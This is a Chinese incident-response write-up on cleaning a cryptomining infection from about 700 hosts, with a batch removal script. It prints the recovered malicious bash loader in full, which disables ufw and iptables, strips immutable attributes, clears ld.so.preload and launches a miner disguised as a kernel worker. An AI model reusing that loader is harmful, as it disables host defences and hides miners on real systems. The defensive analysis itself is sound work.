前期排查


根据态势感知日志,发现主机外联挖矿地址89.147.109.125,但是查看外联进程发现进程对应文件已被删除。



这里使用一个小技巧 可以将内存中的进程信息保存出来。



在进程中过滤kworker2关键字,发现存在异常脚本文件执行,并且在/bin目录下存在异常文件nuBrWiVa



对脚本文件进行分析

#!/bin/bash
# 删除当前用户的 crontab 任务
crontab -r 2>/dev/null
# 禁用 Uncomplicated Firewall
ufw disable 2>/dev/null
# 设置 iptables 防火墙规则,允许所有入站、出站和转发的流量,清空 iptables 规则
iptables -P INPUT ACCEPT 2>/dev/null
iptables -P OUTPUT ACCEPT 2>/dev/null
iptables -P FORWARD ACCEPT 2>/dev/null
iptables -F 2>/dev/null
# 移除系统文件的不可修改属性
chattr -i /usr/sbin/ >/dev/null 2>&1
chattr -i /usr/bin/ >/dev/null 2>&1
chattr -i /bin/ >/dev/null 2>&1
chattr -i /usr/lib >/dev/null 2>&1
chattr -i /usr/lib64 >/dev/null 2>&1
chattr -i /usr/libexec >/dev/null 2>&1
chattr -i /etc/ >/dev/null 2>&1
chattr -i /tmp/ >/dev/null 2>&1
chattr -i /sbin/
chattr -i /etc/resolv.conf
chattr -i /etc/cron.d/systeml >/dev/null 2>&1
chattr -i /etc/cron.weekly/systeml >/dev/null 2>&1
chattr -i /etc/cron.hourly/systeml >/dev/null 2>&1
chattr -i /etc/cron.daily/systeml >/dev/null 2>&1
chattr -i /etc/cron.monthly/systeml >/dev/null 2>&1
# 移除 ld.so.preload 文件的不可修改属性并清空文件内容
chattr -ia /etc/ld.so.preload 2>/dev/null
cat /dev/null > /etc/ld.so.preload 2>/dev/null
# 通过检查是否存在包含以前文件名的文件,生成或读取两个随机的文件名,并将它们保存在 
if [ -e "/usr/lib/systemd/previous_filenames1" ] && [ -e "/usr/lib/systemd/previous_filenames2" ]; then
read -r file1 < "/usr/lib/systemd/previous_filenames1"
read -r file2 < "/usr/lib/systemd/previous_filenames2"
else
file1="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"
file2="/bin/$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | head -n 1)"
echo "$file1" > "/usr/lib/systemd/previous_filenames1"
echo "$file2" > "/usr/lib/systemd/previous_filenames2"
fi
mv x86_64 "$file1" 2>/dev/null
mv i386 "$file2" 2>/dev/null
# 设置变量
SERVICE="kworker2:0H"
EXEC="kworker2:0H"
DIR="/tmp"
# 移除某些文件的不可修改、不可删除、不可设置属性
chattr -iaus /etc/cron.*/$EXEC /etc/init.d/$EXEC 2>/dev/null
# Check if the process is running
if P=$(pgrep -F /bin/.locked) >> /dev/null; then
echo "Running" && exit
else
echo "Not running"
echo -n > /bin/.locked
# Copy the files to the temporary directory
cp "$file1" "$DIR/$EXEC" 2>/dev/null
cp "$file2" "$DIR/neo" 2>/dev/null
chmod +x "$DIR/$EXEC" 2>/dev/null
chmod +x "$DIR/neo" 2>/dev/null
"$DIR/$EXEC" --tls >/dev/null 2>&1
rm -rf "$DIR/$EXEC"
fi
sleep 2
# Check if the process is running and update the lock file
if P1=$(pgrep "$EXEC") 2>/dev/null; then
echo $P1 > /bin/.locked 2>/dev/null
fi
# Execute the command using the value stored in the lock file
"$DIR/neo" "$(cat /bin/.locked)" 2>/dev/null
/bin/nuBrWiVa


上面的脚本可以知道,会生成固定的文件,这个三个文件的文件名是固定的,其中/bin/.locked文件内容为进程的pid信息


  • /usr/lib/systemd/previous_filenames1
  • /usr/lib/systemd/previous_filenames2
  • /bin/.locked



因为进程中执行的恶意脚本文件对计划任务文件有进行操作,因此查看计划任务文件发现,存在恶意计划任务,定期执行恶意文件/bin/nuBrWiVa



在跟进排查/bin/nuBrWiVa对应的服务信息



后面对劫持,启动项账号进行了排查没有发现其他异常,则开始进行处置。


专杀脚本编写


处置单个主机十分简单:停止服务、删除计划任务、结束进程、删除恶意文件即可,但是面对内网近千台主机,绝对不可能一台一台手动处置,因此需要些脚本统一下发处置


后面便是本次应急处置的重点,如何写专杀脚本进行批量处置


总结病毒特点


1、外联矿池地址进程:kworker2:0H

2、执行恶意脚本进程:/bin/随机字符

3、恶意服务:随机字符.service

4、恶意计划任务:/etc/cron.d/随机字符、/etc/cron.daily/随机字符、/etc/cron.weekly/随机字符、/etc/cron.hourly/随机字符、/etc/cron.monthly/随机字符

5、固定文件:/bin/.locked、/usr/lib/systemd/previous_filenames1、/usr/lib/systenetmd/previous_filenames2

6、随机生成的文件:/bin/随机字符(x86_64)、/bin/随机字符(I386)


在这些特点中,最大的问题是,大量的恶意文件都是随机字符文件名,后面便开始梳理随机字符文件的关联性。


梳理特点关联性


1、根据/bin/.locked文件中的内容,可以确定外联进程的PID

2、根据计划任务的文件内容确定执行恶意脚本的进程;

3、根据恶意脚本进程,确定恶意的服务名称


分块编写代码


首先确认外联进程PID,在脚本中加了解挂载的操作,避免进程挂载无法根据PID进行定位。


if [ -e /bin/.locked ]; then
p=$(cat /bin/.locked)
read -ra PID <<< "$p"

for pid_value in "${PID[@]}"; do
echo "[-] Processing PID: $pid_value"

# 执行umount操作
umount -l /proc/$pid_value

# 查找并杀死与PID相关的进程(如果需要的话)
a=$(ps -ef | grep $pid_value | grep "kworker2:0H")
if [ -n "$a" ]; then
kill -9 $pid_value
echo "[+] Evil process with PID $pid_value killed"
fi
done
else
echo "[+] Nothging"
fi


查找恶意计划任务


-r:匹配文件内容

-l:对应文件名称

root /bin/.*1 1:恶意计划任务特征点,由于中间文件名称为随机字符,因此使用.*进行正则匹配

evil_cron=($(grep -r -l "root /bin/.*1 1" /etc/cron.*))
for value in "${evil_cron[@]}"; do
echo "[+] evil_cron: $value"
rm -rf $value
echo "[+] evil_cron:$value 已删除"
done


查找恶意服务,定位恶意服务这里分了3步(重要是的第二步,恶心了我很久)


第一步:通过计划任务获得执行恶意脚本的进行名process_name


第二部:过滤process_name定位进程pid,但是这里有坑,因为grep过滤的时候会输出自己的grep进程,因此这里需要加入grep -v 'grep /bin'把自己的grep进程过滤掉(这里使用awk命令帮助定位到这个关键字的),才能得到恶意进程的pid


第三部:根据进程恶意进程pid,找到服务名称,并stop和disable


process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}'))
echo "[+] process_name: $process_name"
mv "$process_name" /tmp/evil_1112
server_pid=($(ps -ef | grep $process_name | grep -v 'grep /bin' | awk '{print $2}'))
for value in "${server_pid[@]}"; do
echo "[+] server_pid: $value"
done
server_name=($(systemctl status $value | grep "Loaded:" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))
for value in "${server_name[@]}"; do
echo "[+] server_name: $server_name"
break
done
systemctl stop $server_name
systemctl disable $server_name
server_path=/usr/lib/systemd/system/
rm -rf $server_path$server_name
echo "server deleted"


删除固定文件,这里比较简单,就是找指定路径文件,然后获取文件内容,根据文件内容,找到对应文件,在进行删除就行



file_path1="/usr/lib/systemd/previous_filenames1"
if [ -e "$file_path1" ]; then
file_content=$(cat "$file_path1")
echo "File $file_path1 exists, and its content is: $file_content"
mv "$file_content" /tmp/evil_1112
else
echo "File $file_path1 does not exist."
fi
file_path2="/usr/lib/systemd/previous_filenames2"
if [ -e "$file_path2" ]; then
file_content=$(cat "$file_path2")
echo "File $file_path2 exists, and its content is: $file_content"
mv "$file_content" /tmp/evil_1112
else
echo "File $file_path1 does not exist."
fi


整合代码


这里需要注意,因为定位服务是根据计划任务中的文件内容进行定位的,因此查找服务的执行顺序,必须在查找计划任务前面,否则服务无法定位


#! /bin/bash
hostname
if [ ! -d "/tmp/evil_1112" ]; then
mkdir /tmp/evil_1112
fi
#查找特征文件并备份
file_path1="/usr/lib/systemd/previous_filenames1"
if [ -e "$file_path1" ]; then
file_content=$(cat "$file_path1")
echo "[+] File $file_path1 exists, and its content is: $file_content"
mv "$file_content" /tmp/evil_1112 2>/dev/null
else
echo "[+] File $file_path1 does not exist."
fi
file_path2="/usr/lib/systemd/previous_filenames2"
if [ -e "$file_path2" ]; then
file_content=$(cat "$file_path2")
echo "File $file_path2 exists, and its content is: $file_content"
mv "$file_content" /tmp/evil_1112 2>/dev/null
else
echo "File $file_path1 does not exist."
fi
#查找服务并停止
process_name=($(grep -rn "root /bin/.*1 1" /etc/cron.* | awk '{print $(NF-2)}' | uniq))
if [ -z "$process_name" ]; then
echo "[+] process name is not exist"
else
echo "[+] process_name: $process_name"
mv "$process_name" /tmp/evil_1112
fi
evil_process=$(ps -ef | grep -E " /bin/\w+{8}" | awk '{print $8}' | uniq)
if [ -z "$evil_process" ]; then
echo "[+] evil process is not running"
else
if [[ "$evil_process" == "$process_name" ]]; then 
echo "[+] evil process $evil_process is running"
server_pid=($(ps -ef | grep $process_name | grep -v 'color' | awk '{print $2}'))
for value in "${server_pid[@]}"; do
echo "[+] evil server_pid: $value"
done
server_name=($(systemctl status $value | grep "Loaded: loaded" | awk '{print $3}' | awk -F'/' '{print $NF}' | sed 's/;//'))
for value in "${server_name[@]}"; do
echo "[+] evil server_name: $server_name"
break
done
systemctl stop $server_name
systemctl disable $server_name
server_path=/usr/lib/systemd/system/
rm -rf $server_path$server_name
echo "[+] evil server deleted"
else 
echo "[+] evil process is not running"
fi
fi

#查找计划任务并删除
evil_cron=($(grep -r -l "root /bin/.*1 1" /etc/cron.*))
for value in "${evil_cron[@]}"; do
echo "[+] evil cron: $value"
rm -rf $value
echo "[+] evil cron:$value deleted"
done

#查找外联进程并kill
if [ -e /bin/.locked ]; then
p=$(cat /bin/.locked)
read -ra PID <<< "$p"

for pid_value in "${PID[@]}"; do
echo "[-] Processing PID: $pid_value"

# 执行umount操作
umount -l /proc/$pid_value 2>/dev/null

# 查找并杀死与PID相关的进程(如果需要的话)
a=$(ps -ef | grep $pid_value | grep "kworker2")
if [ -n "$a" ]; then
kill -9 $pid_value
echo "[+] Evil process with PID $pid_value killed"
fi
done
else
echo "[+] Nothging"
fi


最后通过堡垒机批量下发,成功处置700多台机器